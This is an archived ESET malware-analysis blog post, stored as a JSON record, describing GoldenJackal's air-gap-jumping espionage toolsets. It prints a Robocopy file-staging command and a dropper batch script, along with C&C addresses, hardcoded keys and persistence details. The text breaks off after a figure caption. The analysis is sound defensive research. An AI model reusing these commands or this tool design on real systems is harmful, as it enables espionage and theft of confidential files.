{
	"id": "efb3ef34-3a02-4f65-a656-2e4adfbdd7cf",
	"created_at": "2026-04-06T00:12:49.950945Z",
	"updated_at": "2026-04-10T03:33:35.592122Z",
	"deleted_at": null,
	"sha1_hash": "7439fdf6bdddb43015fe67a25183dbcbf270b8aa",
	"title": "Mind the (air) gap: GoldenJackal gooses government guardrails",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 855558,
	"plain_text": "Mind the (air) gap: GoldenJackal gooses government guardrails\r\nBy Matías Porolli\r\nArchived: 2026-04-05 16:02:42 UTC\r\nESET researchers discovered a series of attacks on a governmental organization in Europe using tools capable of targeting\r\nair-gapped systems. The campaign, which we attribute to GoldenJackal, a cyberespionage APT group that targets\r\ngovernment and diplomatic entities, took place from May 2022 to March 2024. By analyzing the toolset deployed by the\r\ngroup, we were able to identify an attack GoldenJackal carried out earlier, in 2019, against a South Asian embassy in\r\nBelarus that, yet again, targeted the embassy’s air-gapped systems with custom tools.\r\nThis blogpost introduces previously undocumented tools that we attribute to GoldenJackal based on victimology, code, and\r\nfunctional similarities between the toolsets.\r\nKey points of the blogpost:\r\nGoldenJackal used a custom toolset to target air-gapped systems at a South Asian embassy in Belarus since\r\nat least August 2019. In this blogpost, we describe these tools publicly for the first time.\r\nThis blogpost also features the first public description of a highly modular toolset GoldenJackal deployed\r\non various occasions between May 2022 and March 2024 against a national government organization of a\r\ncountry in the European Union.\r\nThese toolsets provide GoldenJackal a wide set of capabilities for compromising and persisting in targeted\r\nnetworks. Victimized systems are abused to collect interesting information, process the information,\r\nexfiltrate files, and distribute files, configurations and commands to other systems.\r\nThe ultimate goal of GoldenJackal seems to be stealing confidential information, especially from high-profile machines that might not be connected to the internet.\r\nGoldenJackal profile\r\nGoldenJackal is an APT group active since at least 2019. 
It targets government and diplomatic entities in Europe, the Middle\r\nEast, and South Asia. The group is little known and has only been publicly described in 2023 by Kaspersky. The group’s\r\nknown toolset includes several implants written in C#: JackalControl, JackalSteal, JackalWorm, JackalPerInfo, and\r\nJackalScreenWatcher – all of them used for espionage.\r\nOverview\r\nIn May 2022, we discovered a toolset that we could not attribute to any APT group. But once the attackers used a tool\r\nsimilar to one of those publicly documented by Kaspersky, we were able to dig deeper and to find a connection between the\r\npublicly documented toolset of GoldenJackal and this new one.\r\nExtrapolating from that, we managed to identify an earlier attack where the publicly documented toolset was deployed, as\r\nwell as an older toolset that also has capabilities to target air-gapped systems. This blogpost shines a light on the technical\r\naspects of the publicly undocumented toolsets, and shares some insights about GoldenJackal’s tactics, techniques, and\r\nprocedures.\r\nVictimology\r\nGoldenJackal has been targeting governmental entities in Europe, the Middle East, and South Asia. We detected\r\nGoldenJackal tools at a South Asian embassy in Belarus in August and September 2019, and again in July 2021.\r\nKaspersky reported a limited number of attacks against government and diplomatic entities in the Middle East and South\r\nAsia, starting in 2020.\r\nMore recently, according to ESET telemetry, a national government organization of a country in the European Union was\r\nrepeatedly targeted from May 2022 until March 2024.\r\nAttribution\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 1 of 21\n\nAll the campaigns that we describe in this blogpost deployed, at some point, at least one of the tools attributed to the\r\nGoldenJackal APT group by Kaspersky. 
As was the case in the Kaspersky report, we can’t attribute GoldenJackal’s activities\r\nto any specific nation-state. There is, however, one clue that might point towards the origin of the attacks: in the\r\nGoldenHowl malware, the C\u0026C protocol is referred to as transport_http, which is an expression typically used by Turla (see\r\nour ComRat v4 report) and MoustachedBouncer. This may indicate that the developers of GoldenHowl are Russian\r\nspeakers.\r\nBreaching air-gapped systems\r\nIn order to minimize the risk of compromise, highly sensitive networks are often air gapped, i.e., isolated from other\r\nnetworks. Usually, organizations will air gap their most valuable systems, such as voting systems and industrial control\r\nsystems running power grids. These are often precisely the networks that are of most interest to attackers.\r\nAs we stated in a previous white paper titled Jumping the air gap: 15 years of nation-state effort, compromising an air-gapped network is much more resource-intensive than breaching an internet-connected system, which means that\r\nframeworks designed to attack air-gapped networks have so far been exclusively developed by APT groups. The purpose of\r\nsuch attacks is always espionage, perhaps with a side of sabotage.\r\nWith the level of sophistication required, it is quite unusual that in five years, GoldenJackal managed to build and deploy not\r\none, but two separate toolsets designed to compromise air-gapped systems. This speaks to the resourcefulness of the group.\r\nThe attacks against a South Asian embassy in Belarus made use of custom tools that we have only seen in that specific\r\ninstance. 
The campaign used three main components: GoldenDealer to deliver executables to the air-gapped system via USB\r\nmonitoring; GoldenHowl, a modular backdoor with various functionalities; and GoldenRobo, a file collector and exfiltrator.\r\nIn the latest series of attacks against a government organization in Europe, GoldenJackal moved on from the original toolset\r\nto a new, highly modular one. This modular approach applied not only to the design of the malicious tools (as was the case\r\nwith GoldenHowl), but also to their roles: they were used, among other things, to collect and process interesting\r\ninformation, to distribute files, configurations, and commands to other systems, and to exfiltrate files.\r\nTechnical analysis\r\nInitial access\r\nSo far, we haven’t been able to trace back to the initial compromise vector in the campaigns seen in our telemetry. Note that\r\nKaspersky reported in a blogpost that GoldenJackal used trojanized software and malicious documents for this purpose.\r\nThe mysterious toolset from 2019\r\nThe earliest attack that we have attributed to GoldenJackal, which targeted a South Asian embassy in Belarus, occurred in\r\nAugust 2019. The toolset used in this attack is, to the best of our knowledge, publicly undocumented. We’ve only observed\r\nthe following custom tools once, and never again:\r\nA malicious component that can deliver executables to air-gapped systems via USB drives. We’ve named this\r\ncomponent GoldenDealer.\r\nA backdoor, which we’ve named GoldenHowl, with various modules for malicious capabilities.\r\nA malicious file collector and exfiltrator, which we’ve named GoldenRobo.\r\nAn overview of the attack is shown in Figure 1. The initial attack vector is unknown, so we assume that GoldenDealer and\r\nan unknown worm component are already present on a compromised PC that has access to the internet. Whenever a USB\r\ndrive is inserted, the unknown component copies itself and the GoldenDealer component to the drive. 
While we didn’t\r\nobserve this unknown component, we have seen components with similar purposes – such as JackalWorm – in other toolsets\r\nused in later attacks performed by the group.\r\nFigure 1. Overview of the initial compromise of an air-gapped system\r\nIt is probable that this unknown component finds the last modified directory on the USB drive, hides it, and renames itself\r\nwith the name of this directory, which is done by JackalWorm. We also believe that the component uses a folder icon, to\r\nentice the user to run it when the USB drive is inserted in an air-gapped system, which again is done by JackalWorm.\r\nWhen the drive is again inserted into the internet-connected PC, GoldenDealer takes the information about the air-gapped\r\nPC from the USB drive and sends it to the C\u0026C server. The server replies with one or more executables to be run on the air-gapped PC. Finally, when the drive is again inserted into the air-gapped PC, GoldenDealer takes the executables from the\r\ndrive and runs them. Note that this time no user interaction is needed, because GoldenDealer is already running.\r\nWe have observed GoldenDealer running GoldenHowl on an internet-connected PC. While we didn’t observe GoldenDealer\r\ndirectly executing GoldenRobo, we observed the latter also running on the connected PC, used to take files from the USB\r\ndrive and exfiltrate them to its C\u0026C server. There must be yet another unknown component that copies files from the air-gapped PC to the USB drive, but we haven’t observed it yet.\r\nGoldenDealer\r\nThis component monitors the insertion of removable drives on both air-gapped and connected PCs, as well as internet\r\nconnectivity. 
Based on the latter, it can download executable files from a C\u0026C server and hide them on removable drives, or\r\nretrieve them from these drives and execute them on systems that have no connectivity.\r\nThe program can be run with or without arguments. When run with arguments, it takes a path to a file that it moves to a new\r\nlocation and then runs via the CreateProcessW API without creating a window.\r\nTo prevent hidden files from being shown in Windows Explorer, GoldenDealer creates the ShowSuperHidden value in the\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced registry key, and sets it to zero.\r\nIn case GoldenDealer is not running as a service, it creates and starts a service called NetDnsActivatorSharing, then exits. If\r\nfor any reason the service couldn’t be created, persistence is achieved by creating an entry in a Run registry key.\r\nTable 1 shows the list of configuration files used by GoldenDealer. These are located in the directory from which the\r\nmalware is running: C:\\Windows\\TAPI in the observed attack. More details about these files are provided in subsequent\r\nsections.\r\nTable 1. Configuration files used by GoldenDealer\r\nFilename  Purpose \r\nb8b9-de4d-3b06-9d44  Store status fields. \r\nfb43-138c-2eb0-c651  Store executable files sent by the C\u0026C server. \r\n130d-1154-30ce-be1e  Store information about all compromised PCs in the network. \r\n38c4-abb9-74f5-c4e5  Used as a mutex. If this file is open, it means that an instance of GoldenDealer is already running. \r\nThe contents of configuration files are JSON formatted, and stored XOR encrypted on disk. XOR encryption is performed\r\none byte at a time, with a single-byte key that is incremented based on a multiplier.\r\nNetwork connectivity thread\r\nIn order to determine whether a PC is connected to the internet, GoldenDealer sends a GET request to\r\nhttps://1.1.1.1/\u003cuser_id\u003e every 15 minutes. 
If the connection fails, or there’s no reply, the PC is assumed to be offline.\r\n1.1.1.1 maps to Cloudflare’s DNS resolver, and the expected behavior is to receive a Not Found document and a 404 status\r\ncode. The \u003cuser_id\u003e part is not relevant here, but is used for C\u0026C communication. GoldenDealer generates this user\r\nidentifier based on:\r\nThe current username as found via the GetUserNameW API.\r\nThe serial number of the first available logical drive in the system. This does not necessarily mean the drive where\r\nthe OS is installed.\r\nThese two strings are separately hashed with the FNV-1a function, and the resulting numbers are XORed together, obtaining\r\na number that identifies the user.\r\nTo keep track of network connectivity status, GoldenDealer uses a global variable that can hold any of the following values:\r\n0 – Malware started running and connectivity has not been checked.\r\n1 – PC doesn’t have internet connectivity.\r\n2 – PC has internet connectivity.\r\nIf the status is 2, a thread is signaled to download executable files from the C\u0026C server, and another thread is signaled to\r\ncopy the executables to USB drives. A thread to get executables from drives and run them will only be signaled when the\r\nstatus is 1. Whenever the status changes, the configuration file b8b9-de4d-3b06-9d44 is updated with the new value. Fields\r\nin this file are:\r\nwmk – network connectivity status.\r\nqotwnk – number of seconds without internet. This value is incremented every 15 minutes and reset to zero when\r\nthere’s connectivity. It can be used if the malware is configured to wait a minimum number of seconds before\r\ndeciding that the PC has no connectivity, but there was no wait in the samples that we observed.\r\nltwnk – unknown. 
This field is not used by the malware.\r\nrpk – list with hashes of executables downloaded from the C\u0026C server.\r\nDownloader thread\r\nThis thread checks the network connectivity status every 30 minutes, and only performs the following actions if the PC is\r\nconnected to the internet. First, a GET request is sent to https://83.24.9[.]124/\u003cuser_id\u003e, just to let the C\u0026C server know\r\nthat another request is to follow. The reply from the server is not processed. If the request fails, then another request is sent\r\nto a secondary server, http://196.29.32[.]210/\u003cuser_id\u003e, probably to notify about failure, as the thread doesn’t continue to\r\nexecute in this case. The URLs are hardcoded in the malware and are not configurable in the samples that we observed.\r\nWhen communication is successful, GoldenDealer sends a request to https://83.24.9[.]124/\u003cuser_id\u003e/fc93-10f4-2a68-d548.\r\nThe server replies with an array of JSON objects with the following fields:\r\nek – a base64-encoded string that is an executable file after being decoded,\r\ntpik – an array of user_ids used to decide whether the executable will be run,\r\nhek – the FNV-1a hash of ek, and\r\napk – date and time when the executable was obtained from the C\u0026C server.\r\nThe contents of the last two fields are not relevant, because they are calculated by the downloader thread, replacing original\r\ndata sent by the C\u0026C server. In both cases, they are stored as decimal numbers.\r\nGoldenDealer will run an executable sent by the server if the corresponding user_id is in the tpik list, and the hek hash is not\r\nin the list of hashes stored in the rpk field in the configuration. In other words, connected PCs can download executables and\r\npass them along to other systems via USB drives, but they can also run received executables. When an executable is run, its\r\nhash is added to the rpk list, ensuring that it will only be executed once by that victim. 
Each executable is written in the\r\nworking directory with the value of \u003chek\u003e as its filename. All JSON objects with received executables are stored on disk, in\r\nthe file fb43-138c-2eb0-c651.\r\nAs the final step, the downloader thread collects information about the compromised system and sends it to\r\nhttps://83.24.9[.]124/\u003cuser_id\u003e/a1e7-4228-df20-1600. The configuration file 130d-1154-30ce-be1e is updated to store this\r\ninformation as well. Figure 2 shows part of the JSON object with the information sent to the C\u0026C server. While all strings\r\nare sent as arrays of decimal character codes, for readability we show them as strings in the image. For example, instead of\r\nlsass.exe, the value [108, 115, 97, 115, 115, 46, 101, 120, 101] is actually sent.\r\nFigure 2. Part of the information sent by the downloader thread to the C\u0026C server\r\nThe members are:\r\niepk – a Boolean value that indicates whether the GoldenDealer process is elevated,\r\npclk – an array of running processes,\r\npglk – an array of installed programs in both Program Files and Program Files (x86) directories,\r\npik – the user_id,\r\nsik – information about the operating system (including version, build, service pack number; architecture; and\r\nBoolean values indicating whether the OS is running on a server, domain controller, or workstation),\r\nuck – the user who is running the GoldenDealer process, and\r\nulk – an array of all users, each with a Boolean value indicating whether the user has administrator privileges.\r\nUSB monitoring thread on connected PCs\r\nGoldenDealer monitors the insertion of removable drives by creating a window titled defaultWindow with a custom event\r\nhandler that processes inserted devices and ignores all other system events.\r\nOnce a USB drive has been inserted, this thread patches one byte in the master 
boot record (MBR) of that drive: it searches\r\nfor the offset where the BOOTMGR string resides, and replaces the first O with 0. Then it checks whether the second O has\r\nalso been patched to 0, and exits if it hasn’t. The USB thread that runs on air-gapped PCs does the opposite: it patches the\r\nsecond O, and checks whether the first has already been patched. This means that the USB drive needs to have been inserted\r\nin both a connected PC and an air-gapped PC for the drive to be processed.\r\nIf the check is successful, a hidden directory is created on the USB drive, with two files written inside:\r\n37b3-ebe5-568e-0676 – this file has the same contents as fb43-138c-2eb0-c651 (all the executables sent by the C\u0026C\r\nserver). It’s used to pass the executables to air-gapped systems, for execution.\r\nbc41-ac6f-e55e-61a8 – a file with information from air-gapped PCs. It’s created empty by this thread, then populated\r\nby the USB thread running on air-gapped PCs. The contents of this file are appended to the local file 130d-1154-30ce-be1e (see Table 1), to be sent to the C\u0026C server by the downloader thread.\r\nUSB monitoring thread on air-gapped PCs\r\nThis is complementary to the thread described in the previous section: it takes the file 37b3-ebe5-568e-0676 with\r\nexecutables on the USB drive and copies its contents to the local file fb43-138c-2eb0-c651. It also takes the local file 130d-1154-30ce-be1e with information about the air-gapped system and adds its contents to the bc41-ac6f-e55e-61a8 file on the\r\nUSB drive. The code to obtain system information and to run executables is contained in this thread.\r\nGoldenHowl\r\nAnother tool from GoldenJackal’s 2019 toolset is GoldenHowl, a backdoor written in Python that consists of various\r\nmodules for malicious functionalities. 
It is distributed as a self-extracting archive that contains legitimate Python binaries\r\nand libraries, as well as malicious scripts. Figure 3 shows the contents of one of these archives. The attackers renamed the\r\nPython executable – in version 2.7.15 – as WinAeroModule.exe. This component is intended to be run on PCs with internet\r\nconnectivity, given its functionalities.\r\nFigure 3. Contents of GoldenHowl’s self-extracting archive\r\nThe initial script in GoldenHowl, referred to as core_script in the malware’s configuration file, performs the following\r\nactions:\r\ndecrypts and loads the malware’s configuration from a JSON file,\r\ncreates directories used by the malware, and\r\nstarts a thread for each module.\r\nThe malware’s configuration is decrypted using the Fernet algorithm, with the hardcoded key\r\n_ylmUTbqcx6FxMZ5ZvNxDQZYuNh41yxhKcPJLzxgqEY=. Figure 4 shows part of the decrypted configuration.\r\nFigure 4. Part of GoldenHowl’s decrypted configuration\r\nTable 2 shows the Python modules that we’ve observed – in the order that they appear in the config – along with a\r\ndescription of their functionalities. All modules run indefinitely, except for the persistence_schtasks module, which runs\r\nonly once.\r\nTable 2. Malicious modules in GoldenHowl\r\nModule name  File on disk  Description \r\npersistence_schtasks  5991-8d44-b226-0e6c.py  Creates the scheduled task Microsoft\\Windows\\Multimedia\\SystemSoundsService2 to persist the execution of core_script. \r\nfiles_tree  edc5-4055-37cd-d2d2.py  Generates a listing of files and directories by calling Windows’ tree command, for a path specified in a request sent by the C\u0026C. \r\nfiles_stealer  5488-240b-c00f-203a.py  Exfiltrates a single file to the C\u0026C server. The file path is specified in a request sent by the C\u0026C. 
\r\ndata_transform  8744-a287-35be-4ea0.py  Utility module that takes incoming requests from the C\u0026C server and decrypts them, and takes responses from other modules that need to be sent to the C\u0026C and encrypts them. The encryption algorithm is Fernet, and the key is specific to this module: QRqXhd_iB_Y3LpT2wTVK6Dao5uOq2m5KMiVkMnJfgw4= \r\ntransport_http  63d5-be5f-e4df-7e65.py  Utility module that uploads and downloads files from the C\u0026C server. See the C\u0026C communication section for more information. Note that the word transport is commonly used by Turla and MoustachedBouncer to refer to a type of C\u0026C protocol. Although this might be shared across Russian-speaking developers, this is a low-confidence element for attribution. \r\nupdater  c7b4-0999-aec4-a0c8.py  Utility module that receives a ZIP archive with updated modules or configuration from the C\u0026C server, extracts the archive, and runs core_script in a new process, terminating the current process. \r\nsshcmd  1ee0-7c3a-3331-4df3.py  Connects to an SSH server specified in a request sent by the C\u0026C. Acts as a reverse shell, executing commands received from the C\u0026C. \r\nipscanner  a86b-108c-36c7-6972.py  Generates a listing with active IP addresses in an IP range, based on an IP mask specified in a request sent by the C\u0026C server. To do so, it first sends a message to all IP addresses in the range, on port 59173, and then it runs the command arp -a to obtain the ARP cache tables for all interfaces. \r\nportscanner  2648-69f9-6dc0-3476.py  Generates a listing with ports that are accepting connections, based on an IP address and a list of ports specified in a request sent by the C\u0026C server. 
\r\nsshtunnel  9ea4-fb87-6d57-924a.py  Creates an SSH tunnel with an SSH server, to forward messages going from (and to) a host on a listening port, to a forwarding port on the SSH server. A request from the C\u0026C server specifies: the address and port of the SSH server, username and password for the SSH session, the forwarding port on the SSH server, and the address and port of the listening host. \r\neternalbluechecker  4b19-7f72-8c17-dceb.py  Checks whether a host, specified in a request sent by the C\u0026C server, is vulnerable to a Windows SMB remote code execution vulnerability. The code for this module is the same as in mysmb.py and checker.py from this public repository. There is no code in this module to exploit vulnerable hosts. \r\nsocks_proxy  8b55-3ac9-5c30-d0c4.py  Acts as a proxy server, forwarding packets from a source address to a destination address. The port to listen for incoming connections is specified in a request sent by the C\u0026C server. The code in this module is very similar to that of pysoxy. \r\ntext_writer  0ffc-667e-dce4-b270.py  Writes a text file to a given path. The path and text for writing are specified in a request sent by the C\u0026C server. \r\nC\u0026C communication\r\nAccording to GoldenHowl’s configuration, anything that comes from the C\u0026C server is called a request, and files going to\r\nthe C\u0026C server represent a response. It should be noted that despite this naming convention, GoldenHowl is not a passive\r\nimplant: it initiates the connections to the C\u0026C server. The transport_http module is responsible for communication with the\r\nC\u0026C server, and for writing requests and responses to specific directories. Table 3 shows directories used by GoldenHowl.\r\nTable 3. 
Directories in GoldenHowl’s configuration\r\nName in configuration  Name on disk  Description \r\ndownload_dir  a700-280c-f067-5a06  Stores encrypted requests coming from the C\u0026C server. \r\nupload_dir  b307-05ea-7ac8-c369  Stores encrypted responses, with files or output of commands, to be sent to the C\u0026C server. \r\ndata_dir  cda2-b818-3403-b564  Stores requests sent by the C\u0026C server, which are taken from download_dir, decrypted, and placed in this directory for modules to process. Also stores output of executed commands (responses), which are taken from this directory, encrypted, and written to upload_dir. These actions are performed by the data_transform module. \r\ntemp_dir  5bc5-0788-d469-2f3a  This directory was not used in any observed modules. \r\nRequests and responses have structured filenames:\r\nRequest – \u003cclient_id\u003e\u003cmodule_id\u003e\u003crequest_id\u003e\u003crequest_suffix\u003e\r\nResponse – \u003cclient_id\u003e\u003cmodule_id\u003e\u003crequest_id\u003e\u003cresponse_suffix\u003e\r\nThe fields client_id, request_suffix, and response_suffix are specified in the configuration and are common to all modules\r\n(see Figure 4 for examples). The field module_id indicates which module needs to process a request or generate a response,\r\nand is defined in the configuration section of each individual module. The field request_id is generated on the C\u0026C server,\r\nand ties together requests with responses.\r\nThe transport_http module sends GET requests periodically to the C\u0026C server to check for available requests. 
The\r\nconfiguration fields specific to this module are:\r\nserver_address – address of the C\u0026C server (we observed 83.24.9[.]124, the same address as GoldenDealer’s server),\r\nserver_port – the port used to communicate with the server (we observed 443),\r\nserver_use_ssl – indicates whether HTTP or HTTPS will be used for communication,\r\nbase_timeout_sec – the minimum wait time before contacting the C\u0026C server, and\r\ntimeout_filename – the filename of a text file with a number between 0 and 3600, to specify a different number of\r\nseconds to wait between communications. This file is not included with GoldenHowl, but it could be placed by the\r\nattackers with the text_writer module.\r\nThe address used to contact the C\u0026C server is https://\u003cserver_address\u003e:\u003cserver_port\u003e/\u003cclient_id\u003e/.\r\nGoldenRobo\r\nThe last of the observed tools from the 2019 toolset, GoldenRobo, is a simple component written in Go that executes the\r\nRobocopy utility to stage files and send them to its C\u0026C server. It iterates across all drive letters from A to Z, trying to\r\naccess each drive. 
If successful, a Robocopy command is constructed:\r\nrobocopy \u003cdrive_letter\u003e:\\ \u003cmalware_folder\u003e\\1516-fe89-ad12-8102\\\u003cdrive_letter\u003e\\ *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.pdf *.rtf *.tif *.jpg *.jpeg *.crt *.key *.p12 *.ovpn *.zip *.rar \"\" /S /R:0 /MAXAGE:7 /XD \u003cmalware_folder\u003e\\1516-fe89-ad12-8102\\\\ 1516-fe89-ad12-8102\\\\ \"Application Data\" \"All Users\" \"Documents and Settings\" \"Local Settings\"\r\nIf we break down the command:\r\nfiles are copied from drive_letter,\r\nto \u003cmalware_folder\u003e\\1516-fe89-ad12-8102\\\u003cdrive_letter\u003e\\ (for example: C:\\Windows\\TAPI\\1516-fe89-ad12-8102\\C\\),\r\nonly if the files have extensions .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .jpg, .jpeg, .crt, .key, .p12, .ovpn,\r\n.zip, or .rar,\r\nincluding subdirectories (/S),\r\nnot retrying on failed copies (/R:0),\r\nexcluding files older than seven days (/MAXAGE:7), and\r\nexcluding specified directories (/XD).\r\nCopied files from all drives are archived together in a ZIP file _1423-da77-fe86\u003cmonth\u003e-\u003cday\u003e in the same directory where\r\nGoldenRobo is running (with \u003cmonth\u003e and \u003cday\u003e corresponding to the current date).\r\nThe archive is sent base64 encoded to https://83.24.9[.]124/8102/. The last part of the URL is 8102, which is the same as the\r\nclient_id field in GoldenHowl’s configuration. This URL is hardcoded in GoldenRobo, which tells us that the attackers\r\ncompiled this version of GoldenRobo for this victim exclusively.\r\nThe known toolset: Previously documented by Kaspersky\r\nA few weeks after deploying the previous toolset, GoldenJackal started to use other malicious tools on the same\r\ncompromised computers. 
In September 2019, we observed the execution of PowerShell scripts to download the\r\nJackalControl backdoor. This backdoor was used to execute other PowerShell scripts, to download and run legitimate tools\r\nsuch as Plink and PsExec.\r\nIn various attacks, between September 2019 and January 2024, we observed the following tools in GoldenJackal’s arsenal:\r\nJackalControl,\r\nJackalSteal, a file collector and exfiltrator, and\r\nJackalWorm, used to propagate other malicious components via USB drives. We observed it propagating the\r\nJackalControl backdoor.\r\nAs these components have already been documented by Kaspersky, we will not describe them in this blogpost. However,\r\none interesting point to mention is that in early versions of these tools, URLs for C\u0026C servers were hardcoded in the\r\nmalware binaries. At some point, GoldenJackal modified JackalControl and JackalSteal to receive C\u0026C servers as\r\narguments.\r\nThe latest toolset: Keeping a foothold in the network\r\nIn May 2022, we observed GoldenJackal using a new toolset while targeting a governmental organization in Europe. Most\r\nof these tools are written in Go and provide diverse capabilities, such as collecting files from USB drives, spreading\r\npayloads in the network via USB drives, exfiltrating files, and using some PCs in the network as servers to deliver diverse\r\nfiles to other systems. In addition, we have seen the attackers using Impacket to move laterally across the network.\r\nIn the observed attacks, GoldenJackal started to use a highly modular approach, using various components to perform\r\ndifferent tasks. Some hosts were abused to exfiltrate files, others were used as local servers to receive and distribute staged\r\nfiles or configuration files, and others were deemed interesting for file collection, for espionage purposes. Figure 5 shows a\r\nclassification of the components that are described over the next sections.\r\nFigure 5. 
Components in GoldenJackal’s latest toolset\r\nRegarding network infrastructure, we didn’t observe any external IP addresses in any of the analyzed components. File\r\nexfiltrators use publicly available services such as Google Drive or Outlook SMTP servers.\r\nGoldenUsbCopy\r\nGoldenUsbCopy, which we classify as a collection component, monitors the insertion of USB drives, and copies interesting\r\nfiles to an encrypted container that is stored on disk, to be exfiltrated by other components. According to strings found in the\r\nbinary, the main package for the application is named UsbCopy.\r\nNewly inserted drives are detected by creating a window with name WindowsUpdateManager, to receive system events and\r\nprocess them with a custom handler. If the handler receives a WM_DEVICECHANGE message, with an event type\r\nDBT_DEVICEARRIVAL, and the device type is DBT_DEVTYP_VOLUME, this means a new drive is ready to be\r\nprocessed. Figure 6 shows a side-by-side comparison between decompiled code in GoldenUsbCopy and GoldenDealer. Even\r\nthough each was written in a different programming language, we can see that the code retrieves the letter of the drive to\r\nprocess in the same manner.\r\nFigure 6. Code comparison between GoldenUsbCopy and GoldenDealer\r\nGoldenUsbCopy determines which files to process from a USB drive based on a configuration that is stored AES encrypted\r\nin CFB mode in the file reports.ini. The 32-byte key to decrypt the configuration is hardcoded in the malware. 
After\r\ndecryption, the configuration contains the following fields, in JSON format:\r\noutputCipherFilename – full path to an encrypted archive that acts as a container for other files, such as files that\r\ncontain listings of filenames from newly inserted drives, and files to be exfiltrated,\r\nRSAKey – a public key to encrypt AES keys that are used to encrypt files to be exfiltrated,\r\nlastDate – files that were last modified more than lastDate days ago are not processed,\r\nregistryKey – a key in HKEY_CURRENT_USER that will store SHA-256 hashes of files already processed for\r\nexfiltration,\r\nregistryValue – the registry value that stores the list of hashes,\r\nmaxZIPSize – the maximum size in bytes for outputCipherFilename (more details below),\r\nmaxFileSize – files larger than maxFileSize, in bytes, are not exfiltrated, and\r\nextensionsFile – a list of file extensions for exfiltration (we observed .docx, .pdf, .doc, and .odt).\r\nOnce the configuration is decrypted, GoldenUsbCopy waits for a USB drive to be inserted. A listing of all files on the\r\ninserted drive is written to a text file, which is then archived in a ZIP file, encrypted with AES, and added to\r\noutputCipherFilename. Only the encrypted container is written to disk; intermediate steps, involving text files and archives,\r\nare kept in memory.\r\nA similar procedure is done for files on the drive that meet the criteria for exfiltration: these files are archived together\r\npreserving their directory structure, encrypted with AES, and added to outputCipherFilename. When selecting files for\r\nexfiltration, a list with SHA-256 hashes is retrieved from the registry. If the hash of a file is in that list, the file is not\r\nexfiltrated. 
If the hash isn’t in the list, it is added, so that the file won’t be exfiltrated again.\r\nWhenever adding files to exfiltrate would exceed the maxZIPSize of outputCipherFilename, the excess files are not added to\r\nthe archive for exfiltration, but their paths are added to a text file that is archived, encrypted, and added to\r\noutputCipherFilename.\r\nRegarding encryption, each individual archive that is added to the encrypted container is encrypted with AES in CFB mode,\r\nwith a key and an initialization vector (IV) that are randomly generated on the spot. Both the key and IV need to be stored,\r\nbut only the key is encrypted with RSAKey. Figure 7 shows an example of how these fields are stored in the encrypted\r\ncontainer.\r\nFigure 7. Structure of the encrypted container\r\nGoldenUsbGo\r\nThis component is very similar to GoldenUsbCopy and seems to be a later version of it, based on when we observed them in\r\nour telemetry and comparing Go versions used to compile them. However, GoldenUsbGo achieves the same functionality\r\nwith a simpler implementation:\r\nThere is no configuration file. All criteria for file selection are hardcoded in the malware:\r\nif filename contains a specific word from a list, process the file regardless of all other criteria (the list contains\r\nstrings such as pass, login, and key),\r\nelse, file size must be no bigger than 20 MB,\r\nthe date the file was last modified must be no more than 14 days ago, and\r\nthe file extension must be one of .pdf, .doc, .docx, .sh, or .bat.\r\nInsertion of removable drives is not continuously monitored. 
A hardcoded list of drive letters is checked periodically\r\nto determine if they have an assigned volume of D:, E:, F:, G:, or H:.\r\nThe list of hashes of files that were already processed is kept in memory only.\r\nThere is no size limit for the encrypted container where files are staged for exfiltration.\r\nFiles are not archived but instead are compressed with gzip. Both file contents and filenames are compressed. Figure\r\n8 shows how compressed data is arranged before encryption.\r\nFigure 8. Fields used for gzip-compressed files, before encryption\r\nThe path to the encrypted container is hardcoded in the malware:\r\nC:\\Users\\[redacted]\\appdata\\local\\SquirrelTemp\\SquirrelCache.dat\r\nThe hardcoded username in the path, redacted above, along with the short list of drives and specific filenames to process,\r\ntell us that GoldenUsbGo was compiled and tailored for this particular victim.\r\nCompressed files are encrypted with AES in CFB mode with the hardcoded key Fn$@-fR_*+!13bN5. The structure is the\r\nsame as in GoldenUsbCopy (shown in Figure 7) but without the AES key. After compressing the files, GoldenUsbGo\r\ngenerates a listing of all files on the inserted drive and adds it to the encrypted container, in the same manner as exfiltrated\r\nfiles. The filename for the listing is formed from the current date and time, replacing : with - (for example, 15 Jan 24 13-21\r\nPST).\r\nGoldenAce\r\nThis component, which we classified as a distribution tool in Figure 5, serves to propagate other malicious executables and\r\nretrieve staged files via USB drives. While it could be used to target air-gapped systems, it’s not specifically built for that, as\r\nopposed to GoldenDealer. 
It works together with a lightweight version of JackalWorm and some other unknown component.\r\nGoldenAce periodically checks drives in the list G:, H:, I:, J:, K:, L:, M:, N:, P:, X:, Y:, and Z:, to find one that is mapped to\r\na volume. Then it checks whether a trash directory exists in the root of that drive. If it doesn’t exist, it is created as hidden,\r\nand a file called update is copied to that directory, from the same location where GoldenAce is running. The first directory\r\non the drive (in alphabetical order) that is not hidden is set to hidden, and a file called upgrade is copied to the root of the\r\ndrive and renamed as \u003cname_of_hidden_directory\u003e.exe.\r\nThe file upgrade is actually JackalWorm, an executable that uses a folder icon, and whose purpose is to copy and run the\r\nupdate file on another system where the USB drive is inserted. Unlike the version of JackalWorm described by Kaspersky,\r\nthis one is very limited: it doesn’t have code to monitor drive insertions, and it cannot be configured to perform various\r\nactions. When executed from the root directory of a removable drive, it opens the hidden folder in Windows Explorer and\r\nwrites a batch file to execute the payload in update. Contents of this file, update.bat, are shown in Figure 9.\r\n@echo off\r\ncopy \"\u003cdrive_letter\u003e:\\\\trash\\\\update\" \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\"\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\" \"\u003cdrive_letter\u003e:\\\\trash\"\r\n:check1\r\n@tasklist | findstr /i /b \"update.exe\" \u003enul\r\n@if %errorlevel%==0 goto check1\r\n@del /f /q /a h \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\"\r\n@del /f /q \"C:\\\\Users\\\\\u003cusername\u003e\\\\AppData\\\\Local\\\\update.bat\"\r\nFigure 9. 
